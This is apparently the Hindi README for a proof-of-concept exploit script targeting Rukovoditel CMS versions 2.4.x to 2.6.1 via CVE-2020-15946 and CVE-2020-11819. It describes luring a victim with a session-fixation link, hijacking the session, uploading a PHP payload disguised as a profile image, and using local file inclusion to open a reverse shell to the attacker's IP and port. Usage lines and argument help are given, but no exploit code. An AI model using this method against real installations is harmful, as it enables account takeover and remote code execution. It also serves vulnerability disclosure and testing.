
CVE-2020-11819 और CVE-2020-15946 के लिए अवधारणा का प्रमाण
CVE-2020-11819 और CVE-2020-15946 के लिए प्रूफ ऑफ कॉन्सेप्ट। Rukovoditel 2.4.x, 2.5.x और 2.6.1 पर परीक्षण किया गया।
इस एक्सप्लॉइट में निष्पादन के दो तरीके हैं, सत्र फिक्सेशन भेद्यता (CVE-2020-15946) का उपयोग करना या किसी भी प्रोफाइल के तहत किसी भी खाते के एक्सेस क्रेडेंशियल का उपयोग करना। --type L विकल्प के साथ, यह स्क्रिप्ट एक दुर्भावनापूर्ण लिंक बनाएगी, यदि पीड़ित ब्राउज़र में लिंक एक्सेस करता है, तो एक मनमाना सत्र पहचानकर्ता सेट हो जाएगा जिसका उपयोग उनके फोटो प्रोफाइल पर PHP सामग्री वाली छवि अपलोड करने के बाद उनके सत्र को चुराने के लिए किया जाएगा, और फिर लोकल फाइल इन्क्लूड (CVE-2020-11819) का उपयोग करके एक अच्छा रिवर्स शेल प्राप्त करें या, विकल्पों के साथ --type C -u -p आप क्रेडेंशियल प्रदान कर सकते हैं, PHP सामग्री वाली छवि लोड करें और कोड निष्पादन प्राप्त करने के लिए लोकल फाइल इन्क्लूजन (CVE-2020-11819) का उपयोग करें।
प्रो टिप: रजिस्ट्रेशन मॉड्यूल सक्षम है या नहीं, यह जांचना याद रखें ;)
exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]
Rukovoditel के लिए पोस्ट-ऑथेंटिकेट RCE, स्क्रिप्ट संस्करण 1.0
वैकल्पिक तर्क:
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
-t URL, --target URL CMS Rukovoditel का URL/पूर्ण पथ http://url/path/to/cms/
-u USER, --user USER प्रमाणीकरण के लिए उपयोगकर्ता नाम
-p PASSWORD, --password PASSWORD प्रमाणीकरण के लिए पासवर्ड
-a TYPE, --type TYPE लिंक उत्पन्न करने और सत्र चुराने के लिए -a L का उपयोग करें या यदि आपके पास वेब एप्लिकेशन तक पहुंच क्रेडेंशियल हैं तो -a C का उपयोग करें
--ip IP_ATTACKER रिवर्स शेल के लिए हमलावर का IP!
--port PORT_ATTACKER रिवर्स शेल कनेक्शन के लिए पोर्ट
--proxy PROXY डिबगिंग के लिए http प्रॉक्सी सेटअप करें http://127.0.0.1:8080